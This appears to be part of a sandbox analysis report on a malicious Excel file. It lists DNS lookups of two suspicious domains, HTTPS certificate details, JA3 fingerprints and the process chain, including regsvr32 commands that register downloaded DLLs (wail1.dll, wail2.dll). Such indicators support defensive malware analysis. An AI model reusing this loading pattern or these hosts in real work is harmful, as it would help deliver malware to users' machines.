Jun 22, 2021 21:17:27.321208954 CEST  49740  443  192.168.2.4  5.100.155.169
Jun 22, 2021 21:17:27.375551939 CEST  443  49740  5.100.155.169  192.168.2.4

                                                                                                                                                    UDP Packets

Timestamp  Source Port  Dest Port  Source IP  Dest IP
Jun 22, 2021 21:17:01.385906935 CEST  59123  53  192.168.2.4  8.8.8.8
Jun 22, 2021 21:17:01.442408085 CEST  53  59123  8.8.8.8  192.168.2.4
Jun 22, 2021 21:17:02.279560089 CEST  54531  53  192.168.2.4  8.8.8.8
Jun 22, 2021 21:17:02.338862896 CEST  53  54531  8.8.8.8  192.168.2.4
Jun 22, 2021 21:17:03.630100012 CEST  49714  53  192.168.2.4  8.8.8.8
Jun 22, 2021 21:17:03.680388927 CEST  53  49714  8.8.8.8  192.168.2.4
Jun 22, 2021 21:17:03.945333004 CEST  58028  53  192.168.2.4  8.8.8.8
Jun 22, 2021 21:17:04.005611897 CEST  53  58028  8.8.8.8  192.168.2.4
Jun 22, 2021 21:17:04.580750942 CEST  53097  53  192.168.2.4  8.8.8.8
Jun 22, 2021 21:17:04.634170055 CEST  53  53097  8.8.8.8  192.168.2.4
Jun 22, 2021 21:17:05.680031061 CEST  49257  53  192.168.2.4  8.8.8.8
Jun 22, 2021 21:17:05.734253883 CEST  53  49257  8.8.8.8  192.168.2.4
Jun 22, 2021 21:17:06.932784081 CEST  62389  53  192.168.2.4  8.8.8.8
Jun 22, 2021 21:17:06.983522892 CEST  53  62389  8.8.8.8  192.168.2.4
Jun 22, 2021 21:17:12.956671000 CEST  49910  53  192.168.2.4  8.8.8.8
Jun 22, 2021 21:17:13.015780926 CEST  53  49910  8.8.8.8  192.168.2.4
Jun 22, 2021 21:17:14.273798943 CEST  55854  53  192.168.2.4  8.8.8.8
Jun 22, 2021 21:17:14.371628046 CEST  64549  53  192.168.2.4  8.8.8.8
Jun 22, 2021 21:17:14.374386072 CEST  53  55854  8.8.8.8  192.168.2.4
Jun 22, 2021 21:17:14.431225061 CEST  53  64549  8.8.8.8  192.168.2.4
Jun 22, 2021 21:17:14.871390104 CEST  63153  53  192.168.2.4  8.8.8.8
Jun 22, 2021 21:17:15.022214890 CEST  53  63153  8.8.8.8  192.168.2.4
Jun 22, 2021 21:17:15.882117033 CEST  63153  53  192.168.2.4  8.8.8.8
Jun 22, 2021 21:17:15.934043884 CEST  52991  53  192.168.2.4  8.8.8.8
Jun 22, 2021 21:17:15.945688009 CEST  53  63153  8.8.8.8  192.168.2.4
Jun 22, 2021 21:17:15.990216017 CEST  53  52991  8.8.8.8  192.168.2.4
Jun 22, 2021 21:17:16.926449060 CEST  63153  53  192.168.2.4  8.8.8.8
Jun 22, 2021 21:17:17.017817020 CEST  53  63153  8.8.8.8  192.168.2.4
Jun 22, 2021 21:17:17.178864002 CEST  53700  53  192.168.2.4  8.8.8.8
Jun 22, 2021 21:17:17.234810114 CEST  53  53700  8.8.8.8  192.168.2.4
Jun 22, 2021 21:17:18.264604092 CEST  51726  53  192.168.2.4  8.8.8.8
Jun 22, 2021 21:17:18.314790010 CEST  53  51726  8.8.8.8  192.168.2.4
Jun 22, 2021 21:17:18.984437943 CEST  63153  53  192.168.2.4  8.8.8.8
Jun 22, 2021 21:17:19.048254967 CEST  53  63153  8.8.8.8  192.168.2.4
Jun 22, 2021 21:17:19.277287006 CEST  56794  53  192.168.2.4  8.8.8.8
Jun 22, 2021 21:17:19.330666065 CEST  53  56794  8.8.8.8  192.168.2.4
Jun 22, 2021 21:17:21.777595997 CEST  56534  53  192.168.2.4  8.8.8.8
Jun 22, 2021 21:17:21.829085112 CEST  53  56534  8.8.8.8  192.168.2.4
Jun 22, 2021 21:17:23.028873920 CEST  63153  53  192.168.2.4  8.8.8.8
Jun 22, 2021 21:17:23.088247061 CEST  53  63153  8.8.8.8  192.168.2.4
Jun 22, 2021 21:17:24.075067043 CEST  56627  53  192.168.2.4  8.8.8.8
Jun 22, 2021 21:17:24.134171009 CEST  53  56627  8.8.8.8  192.168.2.4
Jun 22, 2021 21:17:25.753117085 CEST  56621  53  192.168.2.4  8.8.8.8
Jun 22, 2021 21:17:25.807049036 CEST  53  56621  8.8.8.8  192.168.2.4
Jun 22, 2021 21:17:26.222008944 CEST  63116  53  192.168.2.4  8.8.8.8
Jun 22, 2021 21:17:26.281980038 CEST  53  63116  8.8.8.8  192.168.2.4
Jun 22, 2021 21:17:26.727674961 CEST  64078  53  192.168.2.4  8.8.8.8
Jun 22, 2021 21:17:26.779660940 CEST  53  64078  8.8.8.8  192.168.2.4
Jun 22, 2021 21:17:27.634875059 CEST  64801  53  192.168.2.4  8.8.8.8
Jun 22, 2021 21:17:27.691868067 CEST  53  64801  8.8.8.8  192.168.2.4
Jun 22, 2021 21:17:28.836951971 CEST  61721  53  192.168.2.4  8.8.8.8
Jun 22, 2021 21:17:28.895956993 CEST  53  61721  8.8.8.8  192.168.2.4
Jun 22, 2021 21:17:29.912472963 CEST  51255  53  192.168.2.4  8.8.8.8
Jun 22, 2021 21:17:29.962588072 CEST  53  51255  8.8.8.8  192.168.2.4
Jun 22, 2021 21:17:30.788786888 CEST  61522  53  192.168.2.4  8.8.8.8
Jun 22, 2021 21:17:30.841979980 CEST  53  61522  8.8.8.8  192.168.2.4
Jun 22, 2021 21:17:31.789669037 CEST  52337  53  192.168.2.4  8.8.8.8
Jun 22, 2021 21:17:31.844557047 CEST  53  52337  8.8.8.8  192.168.2.4
Jun 22, 2021 21:17:34.578598022 CEST  55046  53  192.168.2.4  8.8.8.8
Jun 22, 2021 21:17:34.640758038 CEST  53  55046  8.8.8.8  192.168.2.4
Jun 22, 2021 21:17:54.513917923 CEST  49612  53  192.168.2.4  8.8.8.8
Jun 22, 2021 21:17:54.688155890 CEST  53  49612  8.8.8.8  192.168.2.4
Jun 22, 2021 21:17:55.295703888 CEST  49285  53  192.168.2.4  8.8.8.8
Jun 22, 2021 21:17:55.437829971 CEST  53  49285  8.8.8.8  192.168.2.4
Jun 22, 2021 21:17:55.657706976 CEST  50601  53  192.168.2.4  8.8.8.8
Jun 22, 2021 21:17:55.739732027 CEST  53  50601  8.8.8.8  192.168.2.4
Jun 22, 2021 21:17:55.959203005 CEST  60875  53  192.168.2.4  8.8.8.8
Jun 22, 2021 21:17:56.023504972 CEST  53  60875  8.8.8.8  192.168.2.4
Jun 22, 2021 21:17:56.076572895 CEST  56448  53  192.168.2.4  8.8.8.8
Jun 22, 2021 21:17:56.138561010 CEST  53  56448  8.8.8.8  192.168.2.4
Jun 22, 2021 21:17:56.596339941 CEST  59172  53  192.168.2.4  8.8.8.8
Jun 22, 2021 21:17:56.658346891 CEST  53  59172  8.8.8.8  192.168.2.4
Jun 22, 2021 21:17:57.267401934 CEST  62420  53  192.168.2.4  8.8.8.8
Jun 22, 2021 21:17:57.329380035 CEST  53  62420  8.8.8.8  192.168.2.4
Jun 22, 2021 21:17:57.953587055 CEST  60579  53  192.168.2.4  8.8.8.8
Jun 22, 2021 21:17:58.013736963 CEST  53  60579  8.8.8.8  192.168.2.4
Jun 22, 2021 21:17:58.555749893 CEST  50183  53  192.168.2.4  8.8.8.8
Jun 22, 2021 21:17:58.607477903 CEST  53  50183  8.8.8.8  192.168.2.4
Jun 22, 2021 21:17:59.602802992 CEST  61531  53  192.168.2.4  8.8.8.8
Jun 22, 2021 21:17:59.667856932 CEST  53  61531  8.8.8.8  192.168.2.4
Jun 22, 2021 21:18:00.696434975 CEST  49228  53  192.168.2.4  8.8.8.8
Jun 22, 2021 21:18:00.757081032 CEST  53  49228  8.8.8.8  192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:18:01.763752937 CEST5979453192.168.2.48.8.8.8
                                                                                                                                                    Jun 22, 2021 21:18:01.822868109 CEST53597948.8.8.8192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:18:13.826941013 CEST5591653192.168.2.48.8.8.8
                                                                                                                                                    Jun 22, 2021 21:18:13.890500069 CEST53559168.8.8.8192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:18:45.064620018 CEST5275253192.168.2.48.8.8.8
                                                                                                                                                    Jun 22, 2021 21:18:45.138780117 CEST53527528.8.8.8192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:18:46.720510960 CEST6054253192.168.2.48.8.8.8
                                                                                                                                                    Jun 22, 2021 21:18:46.787154913 CEST53605428.8.8.8192.168.2.4

DNS Queries

Timestamp                            | Source IP   | Dest IP | Trans ID | OP Code            | Name                | Type           | Class
Jun 22, 2021 21:17:24.075067043 CEST | 192.168.2.4 | 8.8.8.8 | 0xc58e   | Standard query (0) | senderoalcielo.com  | A (IP address) | IN (0x0001)
Jun 22, 2021 21:17:26.222008944 CEST | 192.168.2.4 | 8.8.8.8 | 0x6d7f   | Standard query (0) | theottomandoner.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp                            | Source IP | Dest IP     | Trans ID | Reply Code   | Name                | CName | Address         | Type           | Class
Jun 22, 2021 21:17:24.134171009 CEST | 8.8.8.8   | 192.168.2.4 | 0xc58e   | No error (0) | senderoalcielo.com  |       | 108.167.165.249 | A (IP address) | IN (0x0001)
Jun 22, 2021 21:17:26.281980038 CEST | 8.8.8.8   | 192.168.2.4 | 0x6d7f   | No error (0) | theottomandoner.com |       | 5.100.155.169   | A (IP address) | IN (0x0001)

HTTPS Packets

Timestamp: Jun 22, 2021 21:17:24.474009037 CEST
Source IP:Port: 108.167.165.249:443
Dest IP:Port: 192.168.2.4:49738
Certificate chain (Subject | Issuer | Not Before | Not After):
  CN=senderoalcielo.com | CN=R3, O=Let's Encrypt, C=US | Sun May 30 04:16:52 CEST 2021 | Sat Aug 28 04:16:52 CEST 2021
  CN=R3, O=Let's Encrypt, C=US | CN=ISRG Root X1, O=Internet Security Research Group, C=US | Fri Sep 04 02:00:00 CEST 2020 | Mon Sep 15 18:00:00 CEST 2025
  CN=ISRG Root X1, O=Internet Security Research Group, C=US | CN=DST Root CA X3, O=Digital Signature Trust Co. | Wed Jan 20 20:14:03 CET 2021 | Mon Sep 30 20:14:03 CEST 2024
JA3 SSL Client Fingerprint: 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0
JA3 SSL Client Digest: 37f463bf4616ecd445d4a1937da06e19

Timestamp: Jun 22, 2021 21:17:26.400989056 CEST
Source IP:Port: 5.100.155.169:443
Dest IP:Port: 192.168.2.4:49740
Certificate chain (Subject | Issuer | Not Before | Not After):
  CN=www.theottomandoner.theottomandoner.co.uk | CN=R3, O=Let's Encrypt, C=US | Mon Jun 21 15:18:17 CEST 2021 | Sun Sep 19 15:18:16 CEST 2021
  CN=R3, O=Let's Encrypt, C=US | CN=ISRG Root X1, O=Internet Security Research Group, C=US | Fri Sep 04 02:00:00 CEST 2020 | Mon Sep 15 18:00:00 CEST 2025
  CN=ISRG Root X1, O=Internet Security Research Group, C=US | CN=DST Root CA X3, O=Digital Signature Trust Co. | Wed Jan 20 20:14:03 CET 2021 | Mon Sep 30 20:14:03 CEST 2024
JA3 SSL Client Fingerprint: 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0
JA3 SSL Client Digest: 37f463bf4616ecd445d4a1937da06e19

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

Behavior

System Behavior

General

Start time: 21:17:11
Start date: 22/06/2021
Path: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Wow64 process (32bit): true
Commandline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Imagebase: 0xa40000
File size: 27110184 bytes
MD5 hash: 5D6638F2C8F8571C593999C58866007E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 21:17:14
Start date: 22/06/2021
Path: C:\Windows\splwow64.exe
Wow64 process (32bit): false
Commandline: C:\Windows\splwow64.exe 12288
Imagebase: 0x7ff77ee90000
File size: 130560 bytes
MD5 hash: 8D59B31FF375059E3C32B17BF31A76D5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 21:17:26
Start date: 22/06/2021
Path: C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit): true
Commandline: regsvr32 ..\wail1.dll
Imagebase: 0x1040000
File size: 20992 bytes
MD5 hash: 426E7499F6A7346F0410DEAD0805586B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 21:17:26
Start date: 22/06/2021
Path: C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit): true
Commandline: regsvr32 ..\wail2.dll
Imagebase: 0x1040000
File size: 20992 bytes
MD5 hash: 426E7499F6A7346F0410DEAD0805586B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Disassembly

Code Analysis